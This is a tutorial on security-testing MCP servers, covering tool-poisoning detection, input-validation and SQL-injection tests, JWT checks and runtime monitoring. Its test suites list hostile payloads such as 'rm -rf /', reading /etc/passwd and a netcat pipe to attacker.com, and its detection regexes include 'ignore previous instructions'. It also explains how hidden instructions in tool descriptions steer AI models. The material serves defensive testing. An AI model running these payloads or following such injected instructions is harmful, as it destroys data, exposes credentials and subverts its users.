The Quick Answer
Test MCP server security by scanning for tool poisoning attacks, validating input sanitization, and verifying authentication flows:
# Install MCP security scanner
npm install -g @invariantlabs/mcp-scan
# Run comprehensive security scan
mcp-scan --server ./server.js --mode full
# Test for command injection vulnerabilities
def test_command_injection():
    malicious_input = "test; rm -rf /"
    response = mcp_client.call_tool("execute", {
        "command": malicious_input
    })
    assert "permission denied" in response.error
MCP servers face unique security challenges from tool poisoning and prompt injection attacks. Regular security testing helps catch the flaws that lead to data exfiltration and unauthorized system access before they reach production.
Prerequisites
- Node.js 18+ or Python 3.8+ installed
- MCP server implementation to test
- Basic understanding of JSON-RPC protocol
- Access to security testing tools (mcp-scan, pytest)
Installation
Install the essential security testing tools for comprehensive MCP server validation:
# MCP security scanner for automated vulnerability detection
npm install -g @invariantlabs/mcp-scan
# Python testing framework with security extensions
pip install pytest pytest-security mcp-client
# JSON-RPC fuzzing tool for protocol testing
npm install -g rpc-fuzzer
Understanding MCP Security Threats
MCP servers operate as bridges between AI models and sensitive systems, creating unique attack vectors. Tool poisoning attacks embed malicious instructions within tool descriptions that remain invisible to users but influence AI behavior. Command injection vulnerabilities arise when servers pass unsanitized inputs to system commands or databases.
The most critical threats include Full-Schema Poisoning (FSP), where attackers manipulate entire tool schemas beyond just descriptions. This extends to tool names, parameter types, default values, and enumeration options. Traditional security measures often miss these vectors because they focus solely on input validation rather than schema integrity.
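One way to test schema integrity, rather than only input validation, is to fingerprint each full tool definition at review time and fail when the served definition later differs. The sketch below is a minimal illustration under assumptions: the tool dictionary layout, the `schema_fingerprint` and `find_schema_drift` helpers, and the pinned-digest store are all hypothetical and not part of any MCP library.

```python
import hashlib
import json


def schema_fingerprint(tool: dict) -> str:
    """Return a SHA-256 hex digest over the canonical JSON form of a tool definition."""
    # sort_keys makes the digest independent of key order
    canonical = json.dumps(tool, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def find_schema_drift(tools: list, pinned: dict) -> list:
    """List names of tools that are new or whose full schema differs from its pinned digest."""
    drifted = []
    for tool in tools:
        name = tool["name"]
        if pinned.get(name) != schema_fingerprint(tool):
            drifted.append(name)
    return drifted


# Hypothetical tool definition, reviewed and pinned at approval time
approved = {
    "name": "file_read",
    "description": "Read a file from the workspace",
    "inputSchema": {"type": "object", "properties": {"path": {"type": "string"}}},
}
pinned = {approved["name"]: schema_fingerprint(approved)}

# Later, the same tool is served with a poisoned default value
served = json.loads(json.dumps(approved))
served["inputSchema"]["properties"]["path"]["default"] = "~/.ssh/id_rsa"

print(find_schema_drift([approved], pinned))
print(find_schema_drift([served], pinned))
```

Because the digest covers names, parameter types, defaults, and enumerations alike, a change in any schema field is reported, not just a change in the description.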
Tool Poisoning Detection
Tool poisoning represents the most insidious threat to MCP servers. Attackers hide malicious prompts within tool metadata that AI models process but users never see. These attacks bypass traditional security controls by exploiting the trust relationship between models and tool descriptions.
import json
import re

from mcp_client import MCPClient


def detect_tool_poisoning(server_url):
    """Scan MCP server tools for hidden malicious instructions"""
    client = MCPClient(server_url)
    tools = client.list_tools()
    suspicious_patterns = [
        r"ignore previous instructions",
        r"<system>.*</system>",
        r"IMPORTANT:.*MUST",
        # ANSI escape sequences. json.dumps writes ESC as the text \u001b,
        # so match both the raw byte and the escaped form.
        r"(?:\x1b|\\u001b)\[.*?m",
        r"base64\.b64decode"
    ]
    vulnerabilities = []
    for tool in tools:
        # Check all schema fields, not just descriptions
        schema_text = json.dumps(tool, default=str)
        for pattern in suspicious_patterns:
            if re.search(pattern, schema_text, re.IGNORECASE):
                vulnerabilities.append({
                    "tool": tool["name"],
                    "pattern": pattern,
                    "severity": "high"
                })
    return vulnerabilities


# Usage in test suite
def test_no_tool_poisoning():
    vulns = detect_tool_poisoning("http://localhost:8000")
    assert len(vulns) == 0, f"Found tool poisoning: {vulns}"
Advanced poisoning techniques use Unicode homoglyphs or zero-width characters to hide payloads. Detection must therefore inspect the underlying code points rather than the rendered text. Schema validation should enforce strict typing and reject fields containing linguistic instructions disguised as configuration.
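A code-point-level check for hidden characters can be sketched with the standard `unicodedata` module. This is a heuristic illustration only: `find_hidden_characters` and `has_mixed_scripts` are hypothetical helper names, and the script check covers just Latin, Cyrillic, and Greek, which is an assumption about the most likely homoglyph sources.

```python
import unicodedata


def find_hidden_characters(text: str) -> list:
    """Return (index, name) pairs for format characters, which do not render visibly.

    Unicode category "Cf" includes zero-width spaces and joiners as well as
    bidirectional override controls.
    """
    hits = []
    for index, ch in enumerate(text):
        if unicodedata.category(ch) == "Cf":
            hits.append((index, unicodedata.name(ch, f"U+{ord(ch):04X}")))
    return hits


def has_mixed_scripts(word: str) -> bool:
    """Heuristic homoglyph check: does a single word mix Latin with Cyrillic or Greek?"""
    scripts = set()
    for ch in word:
        if ch.isalpha():
            name = unicodedata.name(ch, "")
            for script in ("LATIN", "CYRILLIC", "GREEK"):
                if name.startswith(script):
                    scripts.add(script)
    return len(scripts) > 1


# A description with a zero-width space, and a tool name using a Cyrillic "a"
print(find_hidden_characters("read\u200bfile"))
print(has_mixed_scripts("p\u0430ypal"))
```

Running both checks over every string in a tool schema, including names, defaults, and enum values, complements the regex patterns, which only see characters that a pattern author thought to list.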
Input Validation Testing
MCP servers frequently execute system commands or database queries based on AI-generated inputs. Without proper sanitization, these become vectors for command injection attacks. Testing must verify that all user inputs undergo appropriate validation before processing.
// Comprehensive input validation test suite
const { MCPTestClient } = require('@mcp/test-utils');

describe('Input Validation Security', () => {
  let client;

  beforeEach(() => {
    client = new MCPTestClient('http://localhost:3000');
  });

  test('prevents command injection in shell tools', async () => {
    const maliciousInputs = [
      'valid.txt; cat /etc/passwd',
      'test`whoami`',
      'file$(rm -rf /)',
      'test\nrm -rf /',
      'test|nc attacker.com 4444'
    ];
    for (const input of maliciousInputs) {
      const response = await client.callTool('file_read', {
        path: input
      });
      // Should either sanitize or reject malicious input
      expect(response.error || response.sanitized).toBeTruthy();
      expect(response.output).not.toContain('passwd');
    }
  });

  test('prevents SQL injection in database tools', async () => {
    const sqlInjectionPayloads = [
      "'; DROP TABLE users; --",
      "1' OR '1'='1",
      "admin'--",
      "1; INSERT INTO admins VALUES ('hacker', 'password')"
    ];
    for (const payload of sqlInjectionPayloads) {
      const response = await client.callTool('db_query', {
        query: `SELECT * FROM users WHERE id = '${payload}'`
      });
      // Must use parameterized queries
      expect(response.error?.code).toBe('INVALID_QUERY');
    }
  });
});
Effective input validation combines multiple layers: type checking, length limits, character whitelisting, and context-aware sanitization. The server should log all rejected inputs for security monitoring while avoiding information disclosure in error messages.
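The layers named above can be sketched for a single file-path parameter. The limits, the allowlist, the `validate_path_param` name, and the reason codes are illustrative assumptions, not values prescribed by MCP; a real server would tune them per tool.

```python
import re

MAX_PATH_LENGTH = 255
# Allowlist: letters, digits, dot, underscore, hyphen, forward slash
ALLOWED_PATH = re.compile(r"[A-Za-z0-9._/-]+")


def validate_path_param(value):
    """Return (ok, reason). The reason is a generic code that is safe to show to callers."""
    # Layer 1: type checking
    if not isinstance(value, str):
        return False, "invalid_type"
    # Layer 2: length limits
    if not 0 < len(value) <= MAX_PATH_LENGTH:
        return False, "invalid_length"
    # Layer 3: character allowlist (rejects shell metacharacters and newlines)
    if not ALLOWED_PATH.fullmatch(value):
        return False, "invalid_characters"
    # Layer 4: context-aware check, a path must stay inside the workspace
    if value.startswith("/") or ".." in value.split("/"):
        return False, "path_not_allowed"
    return True, "ok"


for candidate in ["docs/readme.txt", "valid.txt; cat /etc/passwd", "../etc/passwd"]:
    print(candidate, validate_path_param(candidate))
```

Returning a short reason code keeps error messages uninformative to an attacker, while the server can log the full rejected input separately for monitoring.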
Authentication Flow Testing
MCP servers implementing OAuth 2.0 or custom authentication require thorough testing of token handling, session management, and authorization boundaries. Security tests must verify that authentication cannot be bypassed and that tokens properly scope access.
import asyncio
import jwt
from datetime import datetime, timedelta, timezone


class MCPAuthTester:
    # _make_authenticated_request, _get_token, and _call_tool are transport
    # helpers that must be implemented for the server under test.

    def __init__(self, server_url, auth_endpoint):
        self.server_url = server_url
        self.auth_endpoint = auth_endpoint

    async def test_token_validation(self):
        """Verify server properly validates JWT tokens"""
        now = datetime.now(timezone.utc)
        test_cases = []
        # Test 1: Expired token, signed with the correct secret so that
        # only the expiry check can reject it
        expired_token = jwt.encode({
            "exp": now - timedelta(hours=1),
            "sub": "test_user"
        }, "correct_secret", algorithm="HS256")
        test_cases.append({
            "name": "expired_token",
            "token": expired_token,
            "expected_error": "TOKEN_EXPIRED"
        })
        # Test 2: Invalid signature
        invalid_sig_token = jwt.encode({
            "exp": now + timedelta(hours=1),
            "sub": "test_user"
        }, "wrong_secret", algorithm="HS256")
        test_cases.append({
            "name": "invalid_signature",
            "token": invalid_sig_token,
            "expected_error": "INVALID_SIGNATURE"
        })
        # Test 3: Missing required claims
        incomplete_token = jwt.encode({
            "exp": now + timedelta(hours=1)
            # Missing 'sub' claim
        }, "correct_secret", algorithm="HS256")
        test_cases.append({
            "name": "missing_claims",
            "token": incomplete_token,
            "expected_error": "MISSING_CLAIMS"
        })
        results = []
        for test in test_cases:
            response = await self._make_authenticated_request(
                test["token"]
            )
            results.append({
                "test": test["name"],
                "passed": response.get("error") == test["expected_error"]
            })
        return results

    async def test_authorization_boundaries(self):
        """Ensure users cannot access resources beyond their scope"""
        # Get tokens with different permission levels
        user_token = await self._get_token("user", ["read"])
        admin_token = await self._get_token("admin", ["read", "write", "delete"])
        # Test user cannot perform admin actions
        user_response = await self._call_tool(
            "delete_resource",
            {"id": "sensitive_123"},
            user_token
        )
        assert user_response["error"] == "INSUFFICIENT_PERMISSIONS"
        # Test admin can perform restricted actions
        admin_response = await self._call_tool(
            "delete_resource",
            {"id": "sensitive_123"},
            admin_token
        )
        assert admin_response["success"] is True
Authentication testing extends beyond token validation to session fixation, concurrent session limits, and secure token storage. MCP clients often store tokens in configuration files, requiring tests to verify these are properly encrypted and access-controlled.
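The access-control half of that check can be sketched with the standard library on POSIX systems. The `token_file_problems` helper and the temporary file standing in for a client configuration file are assumptions for illustration; the sketch does not cover encryption at rest or Windows ACLs.

```python
import os
import stat
import tempfile


def token_file_problems(path: str) -> list:
    """Return permission problems for a token file, judged by its POSIX mode bits."""
    mode = os.stat(path).st_mode
    problems = []
    if mode & (stat.S_IRGRP | stat.S_IWGRP):
        problems.append("group can read or write")
    if mode & (stat.S_IROTH | stat.S_IWOTH):
        problems.append("others can read or write")
    return problems


# Demonstration with a throwaway file in place of a real client config
with tempfile.NamedTemporaryFile(delete=False) as handle:
    handle.write(b'{"access_token": "placeholder"}')
    demo_path = handle.name

os.chmod(demo_path, 0o644)
loose = token_file_problems(demo_path)   # readable by group and others
os.chmod(demo_path, 0o600)
tight = token_file_problems(demo_path)   # owner-only access
os.remove(demo_path)

print(loose)
print(tight)
```

In a test suite, the same function can be asserted to return an empty list for every configuration file that the MCP client writes.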
Vulnerability Scanning Automation
Automated scanning provides continuous security validation as MCP servers evolve. Integration with CI/CD pipelines ensures vulnerabilities are caught before deployment. Comprehensive scanning combines static analysis, dynamic testing, and behavioral monitoring.
#!/bin/bash
# Automated MCP security scanning pipeline

# Static analysis of tool definitions
echo "Running static security analysis..."
mcp-scan analyze --server ./dist/server.js \
  --checks tool-poisoning,schema-validation \
  --output reports/static-analysis.json

# Dynamic runtime testing
echo "Starting server for dynamic testing..."
npm start &
SERVER_PID=$!
sleep 5

# Fuzzing tool inputs
echo "Fuzzing MCP tool parameters..."
rpc-fuzzer --target http://localhost:3000/rpc \
  --wordlist ./security/fuzzing-payloads.txt \
  --timeout 30 \
  --report reports/fuzzing-results.json

# Authentication bypass attempts
echo "Testing authentication mechanisms..."
python -m pytest tests/security/test_auth.py \
  --json-report --json-report-file=reports/auth-test.json

# Cleanup
kill "$SERVER_PID"

# Generate consolidated report
mcp-scan report --input reports/ --format html > security-report.html
Some scanning tools apply machine learning to identify novel attack patterns. Scanners can also analyze response timing to detect blind injection vulnerabilities and monitor resource usage to identify denial-of-service vectors. Regular scanning with updated threat databases helps keep coverage current as new attacks emerge.
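Timing analysis for blind injection can be approximated by comparing the median latency of a benign input with that of a delay-inducing payload. The sketch below assumes a `call` function that sends one payload to the tool under test; the two stand-in tools, the payload strings, and the 50 ms threshold are hypothetical choices for demonstration.

```python
import statistics
import time


def median_latency(call, payload, samples=5):
    """Median wall-clock time of call(payload) over several samples."""
    timings = []
    for _ in range(samples):
        start = time.perf_counter()
        call(payload)
        timings.append(time.perf_counter() - start)
    return statistics.median(timings)


def looks_time_based(call, benign, delayed, min_gap=0.05, samples=5):
    """Flag the tool when the delay payload is slower than the benign one by min_gap seconds."""
    gap = median_latency(call, delayed, samples) - median_latency(call, benign, samples)
    return gap >= min_gap


# Stand-ins for a real tool call: one executes the injected delay, one ignores it
def vulnerable_tool(payload):
    if "SLEEP" in payload:
        time.sleep(0.1)


def safe_tool(payload):
    return None


print(looks_time_based(vulnerable_tool, "1", "1; SLEEP(0.1)"))
print(looks_time_based(safe_tool, "1", "1; SLEEP(0.1)"))
```

Using the median rather than the mean reduces the effect of a single slow network round trip; against a real server the threshold needs to sit well above normal latency jitter.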
Runtime Security Monitoring
Production MCP servers require continuous monitoring to detect attacks that bypass initial defenses. Runtime protection combines anomaly detection, rate limiting, and automated response to suspicious activities.
const { MCPSecurityMonitor } = require('@mcp/security');

class ProductionSecurityLayer {
  constructor(mcpServer) {
    this.server = mcpServer;
    this.monitor = new MCPSecurityMonitor();
    this.setupMonitoring();
  }

  setupMonitoring() {
    // Track tool invocation patterns
    this.server.on('tool:invoke', async (event) => {
      const analysis = await this.monitor.analyzeInvocation({
        tool: event.tool,
        params: event.params,
        caller: event.session.user,
        timestamp: Date.now()
      });
      if (analysis.risk > 0.8) {
        // High risk - block and alert
        event.preventDefault();
        await this.alertSecurityTeam({
          severity: 'critical',
          event: event,
          analysis: analysis
        });
      } else if (analysis.risk > 0.5) {
        // Medium risk - log and rate limit
        await this.monitor.incrementRiskScore(event.session);
        console.warn(`Suspicious activity: ${analysis.reason}`);
      }
    });

    // Detect anomalous data access patterns
    this.server.on('data:access', (event) => {
      const accessPattern = this.monitor.getAccessPattern(event.session);
      if (accessPattern.isAnomalous) {
        // Possible data exfiltration attempt
        this.applyRateLimit(event.session, {
          requests: 10,
          window: '1m'
        });
      }
    });

    // Monitor for privilege escalation
    this.server.on('auth:elevate', async (event) => {
      const legitimateElevation = await this.monitor.verifyElevation({
        user: event.user,
        requestedScope: event.newScope,
        context: event.context
      });
      if (!legitimateElevation) {
        event.preventDefault();
        await this.lockAccount(event.user);
      }
    });
  }
}
Effective monitoring correlates events across multiple dimensions: temporal patterns, data volumes, error rates, and user behavior. Machine learning models trained on normal usage patterns can identify subtle attacks that rule-based systems miss.
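Before reaching for a trained model, a statistical baseline already illustrates the idea of learning normal usage and flagging departures from it. The following sketch scores a per-minute request count against recent history with a z-score; the `is_anomalous` name, the threshold of 3, and the sample history are assumptions, and a production detector would track several dimensions at once.

```python
import statistics


def is_anomalous(history, current, threshold=3.0):
    """Flag current when it lies more than threshold standard deviations above the baseline mean."""
    if len(history) < 2:
        return False  # not enough data to form a baseline
    mean = statistics.mean(history)
    spread = statistics.stdev(history)
    if spread == 0:
        # Perfectly flat baseline: any increase is a departure from it
        return current > mean
    return (current - mean) / spread > threshold


# Hypothetical requests-per-minute history for one session
baseline = [10, 12, 11, 9, 10, 11]
print(is_anomalous(baseline, 12))   # within normal variation
print(is_anomalous(baseline, 40))   # sudden burst
```

The same function can be applied to data volume or error rate per session, which gives a crude form of the multi-dimensional correlation described above.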
Common Issues
Error: Tool enumeration exposes sensitive operations
MCP servers often expose all available tools without considering the security implications. Attackers use tool discovery to map attack surfaces and identify high-value targets. Implement tool filtering based on authentication level:
def filter_tools_by_permission(tools, user_permissions):
    """Remove sensitive tools from enumeration based on user permissions"""
    filtered = []
    for tool in tools:
        required_perms = tool.get("required_permissions", [])
        if all(perm in user_permissions for perm in required_perms):
            # Strip internal metadata before returning
            public_tool = {
                "name": tool["name"],
                "description": tool["description"],
                "parameters": tool["parameters"]
            }
            filtered.append(public_tool)
    return filtered
The solution involves implementing role-based tool visibility and removing internal implementation details from public tool descriptions. This prevents attackers from gathering intelligence about system internals while maintaining functionality for authorized users.
Error: Rate limiting not applied to JSON-RPC batch requests
Batch requests in JSON-RPC allow multiple method calls in a single HTTP request, potentially bypassing rate limits. Attackers exploit this to overwhelm servers or brute-force authentication. Proper rate limiting must account for the total operations within batch requests:
function applyBatchAwareRateLimit(request, session, rateLimiter) {
  // A batch arrives as a plain array with no session property, so the
  // session is passed in separately instead of being read from the request
  let operationCount = 1;
  if (Array.isArray(request)) {
    // Batch request - count all operations
    operationCount = request.length;
  }
  // Check if user exceeds rate limit
  const allowed = rateLimiter.checkLimit(
    session.userId,
    operationCount
  );
  if (!allowed) {
    throw new Error("Rate limit exceeded");
  }
  // Process request...
}
Implement rate limiting at multiple levels: per-operation, per-request, and per-session. Consider the computational cost of different operations when setting limits. Database queries might have lower limits than simple data retrievals.
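Cost-weighted limiting can be sketched as a per-session budget in which each operation spends a number of units and a batch spends the sum of its members. The cost table, the `CostBudget` class, and the fixed-window policy are illustrative assumptions; the method names follow the tool names used in the examples above.

```python
import time

# Hypothetical per-method costs; unlisted methods cost 1 unit
OPERATION_COST = {"db_query": 5, "file_read": 2}


class CostBudget:
    """Fixed-window budget: each session may spend `limit` cost units per window."""

    def __init__(self, limit, window_seconds=60, clock=time.monotonic):
        self.limit = limit
        self.window = window_seconds
        self.clock = clock
        self.spent = {}  # session_id -> (window_start, units_spent)

    def allow(self, session_id, request):
        """Charge a single call or a whole batch; return False if it exceeds the budget."""
        calls = request if isinstance(request, list) else [request]
        cost = sum(OPERATION_COST.get(call.get("method"), 1) for call in calls)
        now = self.clock()
        start, used = self.spent.get(session_id, (now, 0))
        if now - start >= self.window:
            start, used = now, 0  # window elapsed, reset the budget
        if used + cost > self.limit:
            return False  # reject the whole request, nothing is charged
        self.spent[session_id] = (start, used + cost)
        return True


budget = CostBudget(limit=10)
print(budget.allow("session-1", {"method": "ping"}))
print(budget.allow("session-1", [{"method": "db_query"}] * 3))
```

Rejecting a batch as a whole avoids partially executing it; a server that prefers partial processing would instead charge operations one by one until the budget runs out.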
Error: Insecure direct object references in tool parameters
Tools accepting resource IDs without proper authorization checks enable unauthorized access. An attacker might enumerate IDs to access other users' data. Always verify ownership and permissions before processing resource operations:
async def secure_resource_access(resource_id, user_id, operation):
    """Verify user has permission to access resource"""
    # First check if resource exists
    resource = await db.get_resource(resource_id)
    if not resource:
        raise NotFoundException("Resource not found")
    # Verify ownership or explicit permissions
    if resource.owner_id != user_id:
        permission = await db.check_permission(
            user_id,
            resource_id,
            operation
        )
        if not permission:
            # Log attempted unauthorized access
            await security_log.record({
                "event": "unauthorized_access_attempt",
                "user": user_id,
                "resource": resource_id,
                "operation": operation
            })
            raise ForbiddenException("Access denied")
    return resource
Examples
Comprehensive Security Test Suite
A production-ready security test suite for MCP servers combines multiple testing approaches. This example demonstrates integration of tool poisoning detection, input validation, and authentication testing into a unified framework:
import pytest
import asyncio
from mcp_security_tester import SecurityTester


class TestMCPServerSecurity:
    @pytest.fixture
    def security_tester(self):
        return SecurityTester("http://localhost:8000")

    @pytest.mark.asyncio
    async def test_complete_security_validation(self, security_tester):
        # Phase 1: Static analysis
        static_results = await security_tester.run_static_analysis()
        assert static_results["tool_poisoning_found"] == 0
        assert static_results["unsafe_patterns_found"] == 0
        # Phase 2: Dynamic testing
        dynamic_results = await security_tester.run_dynamic_tests([
            "command_injection",
            "sql_injection",
            "path_traversal",
            "xxe_injection"
        ])
        for test_name, result in dynamic_results.items():
            assert result["blocked"] is True, \
                f"Failed to block {test_name} attack"
        # Phase 3: Authentication testing
        auth_results = await security_tester.test_authentication([
            "token_replay",
            "session_fixation",
            "privilege_escalation"
        ])
        assert all(r["passed"] for r in auth_results)
        # Phase 4: Fuzzing
        fuzz_results = await security_tester.fuzz_parameters(
            iterations=1000,
            timeout=300
        )
        assert fuzz_results["crashes"] == 0
        assert fuzz_results["errors_handled"] == fuzz_results["errors_total"]
The test suite executes in CI/CD pipelines before each deployment. It generates detailed reports highlighting specific vulnerabilities and provides remediation guidance. Regular execution ensures security regressions are caught immediately.
Production Security Monitoring Dashboard
Real-world MCP deployments require visibility into security events. This monitoring implementation tracks suspicious activities and provides alerting for security teams:
const express = require('express');
const { MCPServer } = require('@modelcontextprotocol/server');
const { SecurityDashboard } = require('./security-dashboard');

// Initialize MCP server with security monitoring
const server = new MCPServer({
  middleware: [
    securityLogging,
    rateLimiting,
    authenticationCheck
  ]
});

// Security monitoring middleware
async function securityLogging(req, res, next) {
  const startTime = Date.now();
  // Capture request details
  const requestInfo = {
    method: req.body.method,
    params: req.body.params,
    ip: req.ip,
    userAgent: req.headers['user-agent'],
    timestamp: new Date()
  };
  // Check for suspicious patterns
  const threats = await detectThreats(requestInfo);
  if (threats.length > 0) {
    await dashboard.recordThreat({
      request: requestInfo,
      threats: threats,
      action: 'blocked'
    });
    return res.status(403).json({
      error: "Security policy violation"
    });
  }
  // Log response metrics. Register the listener before handing the
  // request on, so it is in place whenever the response completes.
  res.on('finish', () => {
    dashboard.recordMetric({
      method: requestInfo.method,
      duration: Date.now() - startTime,
      status: res.statusCode
    });
  });
  // Continue with request
  next();
}

// Threat detection logic
async function detectThreats(requestInfo) {
  const threats = [];
  // Check for tool poisoning indicators
  const paramsStr = JSON.stringify(requestInfo.params);
  if (paramsStr.match(/system\]|ignore previous|IMPORTANT:/i)) {
    threats.push({
      type: 'tool_poisoning',
      severity: 'high',
      indicator: 'suspicious_prompt_pattern'
    });
  }
  // Detect potential command injection
  if (paramsStr.match(/[;&|`$()]/)) {
    threats.push({
      type: 'command_injection',
      severity: 'medium',
      indicator: 'shell_metacharacters'
    });
  }
  // Check request rate
  const recentRequests = await dashboard.getRecentRequests(
    requestInfo.ip,
    60 // last 60 seconds
  );
  if (recentRequests > 100) {
    threats.push({
      type: 'rate_limit_abuse',
      severity: 'low',
      indicator: `${recentRequests} requests in 60s`
    });
  }
  return threats;
}

// Start monitoring dashboard
const dashboard = new SecurityDashboard({
  port: 3001,
  alertWebhook: process.env.SECURITY_WEBHOOK
});
dashboard.start();
Production monitoring generates actionable insights through correlation of security events. The dashboard visualizes attack patterns, highlights anomalies, and enables rapid incident response. Integration with SIEM systems provides enterprise-wide security visibility.
With monitoring established, security teams can identify attack campaigns targeting MCP infrastructure. Pattern analysis reveals coordinated attempts to exploit specific vulnerabilities across multiple servers. This intelligence drives proactive defense improvements.
Testing Best Practices
Effective MCP security testing follows established methodologies while adapting to protocol-specific challenges. Tests should run continuously, not just during development. Automate wherever possible but maintain human oversight for complex attack scenarios.
Structure tests to fail safely - a broken test should block deployment rather than allow potentially vulnerable code through. Use test data that mirrors production complexity without containing actual sensitive information. Regular rotation of test credentials prevents long-term exposure if test environments are compromised.
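Failing safely can be made concrete with a deployment gate that treats a missing or unreadable scan report the same as a report with findings. The sketch assumes a hypothetical JSON report containing a `findings` list; the `deployment_allowed` name and the report layout are illustrative, not the output format of any particular scanner.

```python
import json
import os
import tempfile


def deployment_allowed(report_path):
    """Return True only when the report exists, parses, and lists zero findings."""
    try:
        with open(report_path, encoding="utf-8") as handle:
            report = json.load(handle)
        findings = report["findings"]
    except (OSError, ValueError, KeyError, TypeError):
        # Missing file, invalid JSON, or unexpected structure all block the deployment
        return False
    return isinstance(findings, list) and len(findings) == 0


# Demonstration with throwaway report files
with tempfile.TemporaryDirectory() as tmp:
    reports = {
        "clean": '{"findings": []}',
        "dirty": '{"findings": [{"type": "tool_poisoning"}]}',
        "broken": '{"findings": [',
    }
    results = {}
    for name, body in reports.items():
        path = os.path.join(tmp, f"{name}.json")
        with open(path, "w", encoding="utf-8") as handle:
            handle.write(body)
        results[name] = deployment_allowed(path)
    results["missing"] = deployment_allowed(os.path.join(tmp, "missing.json"))

print(results)
```

A CI step would exit with a non-zero status whenever the function returns False, so a crashed scanner cannot silently let a build through.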
Document all security findings with clear reproduction steps and impact assessments. This enables developers to understand and fix issues efficiently. Track metrics like time-to-remediation and vulnerability recurrence to improve security processes over time.